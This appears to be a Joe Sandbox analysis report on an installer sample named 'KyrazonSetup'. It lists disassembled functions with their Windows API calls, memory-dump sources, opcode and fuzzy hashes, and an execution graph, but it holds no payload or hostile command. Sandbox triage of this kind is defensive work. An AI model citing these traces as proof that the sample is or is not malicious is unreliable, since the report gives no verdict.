                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: a964d8526154f294e612e7d9ff9cc29c2813b3260cc8b6307f377bf4ad37abae
                                                                                      • Instruction ID: 282c70e257672687937977203f7442070c9d6a131f668edff497fc8f2aae4d78
                                                                                      • Opcode Fuzzy Hash: a964d8526154f294e612e7d9ff9cc29c2813b3260cc8b6307f377bf4ad37abae
                                                                                      • Instruction Fuzzy Hash: 6DF0ECB2600515BFDB00ABA4DE89DAFB7BCEB44305B04446AF641F2191CA748D018B38
                                                                                      Function 00404888 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(0043C070,0043C070,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                                                                      • wsprintfA.USER32 ref: 0040492E
                                                                                      • SetDlgItemTextA.USER32(?,0043C070), ref: 00404941
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s
                                                                                      • API String ID: 3540041739-3551169577
                                                                                      • Opcode ID: 804bf471802499da587795cb7ce61e75a366ce640a852ab7eb01692b6b25406e
                                                                                      • Instruction ID: 430113f872b093d5cb5bf88e97724e3c6f0970b02c9770434da8b0d71da58b6f
                                                                                      • Opcode Fuzzy Hash: 804bf471802499da587795cb7ce61e75a366ce640a852ab7eb01692b6b25406e
                                                                                      • Instruction Fuzzy Hash: 5A110A776042282BEB00666D9C41EAF3698DB86374F254637FA65F31D1E978CC1242E8
                                                                                      Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$Enum
                                                                                      • String ID:
                                                                                      • API String ID: 464197530-0
                                                                                      • Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                                                                      • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                                                                                      • Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                                                                      • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8
                                                                                      Function 004059D1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,?,C:\,?,00405A3D,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000,00000000), ref: 004059DF
                                                                                      • CharNextA.USER32(00000000), ref: 004059E4
                                                                                      • CharNextA.USER32(00000000), ref: 004059F8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3213498283-3404278061
                                                                                      • Opcode ID: 6ae5a98c75981dc822015e60cfe3a73e92d8e62117e7577616a1c134a98ac786
                                                                                      • Instruction ID: bee55f49184efbd237be32f98b77ae0f226092122a380d38f2b678f3dbc68710
                                                                                      • Opcode Fuzzy Hash: 6ae5a98c75981dc822015e60cfe3a73e92d8e62117e7577616a1c134a98ac786
                                                                                      • Instruction Fuzzy Hash: 26F0F6A1B18F546AFB3262681C94B7B5F8CCB95360F18427BDA40772C2C27C4C408FAA
                                                                                      Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
                                                                                      • GetTickCount.KERNEL32 ref: 00402D30
                                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: 947536967f4a43c584f650ab2a8ee216eadfbd9976cd6052f6af3916685ae4bc
                                                                                      • Instruction ID: 2b7c5c63cbd29ff72544cae52a3e23fe45e5b8c23cd2423cebb75ca464e8a8de
                                                                                      • Opcode Fuzzy Hash: 947536967f4a43c584f650ab2a8ee216eadfbd9976cd6052f6af3916685ae4bc
                                                                                      • Instruction Fuzzy Hash: 1BF05E30A01720ABC6216F60FE4CA9B7A64AB09B16711047AF548B11E5CB78489A8B9D
                                                                                      Function 0040503B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0040506A
                                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                                                                                        • Part of subcall function 0040408B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 05cf8713f746d9a4a406987c7a2bd7a615f31e4f64c05b68a76d054521028bb6
                                                                                      • Instruction ID: 93015a436933028849a201d13bca6df21ec4f6fc61c1de1602f9096dd373d7f3
                                                                                      • Opcode Fuzzy Hash: 05cf8713f746d9a4a406987c7a2bd7a615f31e4f64c05b68a76d054521028bb6
                                                                                      • Instruction Fuzzy Hash: 90017C72200A48EFDF209F51DD80AAF3B65EB84750F14403BFA41B61D1D73A8C929FA9
                                                                                      Function 00405E87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00002000,Remove folder: ,?,?,?,?,00000002,Remove folder: ,?,004060CB,80000002), ref: 00405ECD
                                                                                      • RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\), ref: 00405ED8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: Remove folder:
                                                                                      • API String ID: 3356406503-1958208860
                                                                                      • Opcode ID: a46a7b2256a3cf94146298450ac36a8ef4ab1670e4172636b82585cecf65f891
                                                                                      • Instruction ID: 42c18038d83e96b8be8c57851daa943d9c6deca899c079ab392a8b0fbbc298b2
                                                                                      • Opcode Fuzzy Hash: a46a7b2256a3cf94146298450ac36a8ef4ab1670e4172636b82585cecf65f891
                                                                                      • Instruction Fuzzy Hash: 07015A72500609EBDF228F61CD09FDB3BA9EF55360F00402AF995A2191D778DA54DBA4
                                                                                      Function 0040563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00448078,Error launching installer), ref: 00405668
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405675
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 00405652
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: aaef83747aa1b203b2a57743586283d67b6f7f696a6a6629dc51cceb7310efa5
                                                                                      • Instruction ID: dbacb55137c0e446f5e74d91210fb43b788ebff64a81b2029776477596ab8b01
                                                                                      • Opcode Fuzzy Hash: aaef83747aa1b203b2a57743586283d67b6f7f696a6a6629dc51cceb7310efa5
                                                                                      • Instruction Fuzzy Hash: DAE092B4610209BFEB109BA4EE09F7B7AADEB10604F514425B914E2190EA7598189A7C
                                                                                      Function 00405A9E Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
                                                                                      • CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                      • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                                                                                      • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                      • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9

                                                                                      Execution Graph

                                                                                      Execution Coverage:6%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0.8%
                                                                                      Total number of Nodes:621
                                                                                      Total number of Limit Nodes:23
                                                                                      execution_graph 3687 404ca0 3688 404d32 3687->3688 3690 404cbe 3687->3690 3689 404ba8 RtlUnwind 3689->3690 3690->3688 3690->3689 3632 405001 3633 405008 3632->3633 3634 405010 MultiByteToWideChar 3633->3634 3635 405039 3633->3635 3634->3635 3636 405029 GetStringTypeW 3634->3636 3636->3635 3691 403fa1 3692 403fb0 3691->3692 3693 403fb5 MultiByteToWideChar 3692->3693 3694 40401b 3692->3694 3693->3694 3695 403fce LCMapStringW 3693->3695 3695->3694 3696 403fe9 3695->3696 3697 403fef 3696->3697 3699 40402f 3696->3699 3697->3694 3698 403ffd LCMapStringW 3697->3698 3698->3694 3699->3694 3700 404067 LCMapStringW 3699->3700 3700->3694 3701 40407f WideCharToMultiByte 3700->3701 3701->3694 3675 404055 3676 404063 3675->3676 3677 404067 LCMapStringW 3676->3677 3678 40401b 3676->3678 3677->3678 3679 40407f WideCharToMultiByte 3677->3679 3679->3678 3703 4071e7 3704 402e4a 7 API calls 3703->3704 3705 4071ee 3704->3705 3681 404c98 3684 404ca0 3681->3684 3682 404d32 3684->3682 3685 404ba8 RtlUnwind 3684->3685 3686 404bc0 3685->3686 3686->3684 3706 403c68 3707 403c75 3706->3707 3714 40558a 3707->3714 3709 403c8f 3710 40558a 12 API calls 3709->3710 3713 403cba 3709->3713 3711 403ca8 3710->3711 3712 402e4a 7 API calls 3711->3712 3711->3713 3712->3713 3715 40559e 3714->3715 3716 4055f5 HeapAlloc 3715->3716 3717 406304 5 API calls 3715->3717 3718 405620 3715->3718 3719 406ab1 6 API calls 3715->3719 3716->3715 3716->3718 3717->3715 3718->3709 3719->3715 3019 402d6b GetVersion 3040 404b4a HeapCreate 3019->3040 3021 402dc9 3022 402dd6 3021->3022 3023 402dce 3021->3023 3052 40482a 3022->3052 3187 402e6f 3023->3187 3027 402ddf GetCommandLineA 3066 4046f8 3027->3066 3031 402df9 3089 4043f2 3031->3089 3033 402dfe 3102 401000 3033->3102 3035 402e1f 3202 404199 3035->3202 3041 404ba0 3040->3041 3042 404b6a 3040->3042 3041->3021 3209 404a02 3042->3209 3045 404b79 3221 405f68 HeapAlloc 3045->3221 3046 404ba3 3046->3021 3047 404b86 3047->3046 3223 4067b9 3047->3223 3050 404b83 3050->3046 3051 404b94 HeapDestroy 3050->3051 3051->3041 3286 40504d 3052->3286 3055 404849 GetStartupInfoA 3061 40495a 3055->3061 3065 404895 3055->3065 3058 4049c1 SetHandleCount 3058->3027 3059 404981 GetStdHandle 3059->3061 3062 40498f GetFileType 3059->3062 3060 40504d 12 API calls 3060->3065 3061->3058 3061->3059 3062->3061 3063 404906 3063->3061 3064 404928 GetFileType 3063->3064 3064->3063 3065->3060 3065->3061 3065->3063 3067 404713 GetEnvironmentStringsW 3066->3067 3068 404746 3066->3068 3069 404727 GetEnvironmentStrings 3067->3069 3071 40471b 3067->3071 3070 404737 3068->3070 3068->3071 3069->3070 3072 402def 3069->3072 3070->3072 3076 4047e5 3070->3076 3077 4047d9 GetEnvironmentStrings 3070->3077 3073 404753 GetEnvironmentStringsW 3071->3073 3074 40475f WideCharToMultiByte 3071->3074 3193 4044ab 3072->3193 3073->3072 3073->3074 3078 404793 3074->3078 3079 4047c5 FreeEnvironmentStringsW 3074->3079 3080 40504d 12 API calls 3076->3080 3077->3072 3077->3076 3081 40504d 12 API calls 3078->3081 3079->3072 3087 404800 3080->3087 3082 404799 3081->3082 3082->3079 3083 4047a2 WideCharToMultiByte 3082->3083 3085 4047bc 3083->3085 3086 4047b3 3083->3086 3084 404816 FreeEnvironmentStringsA 3084->3072 3085->3079 3354 405232 3086->3354 3087->3084 3090 4043ff 3089->3090 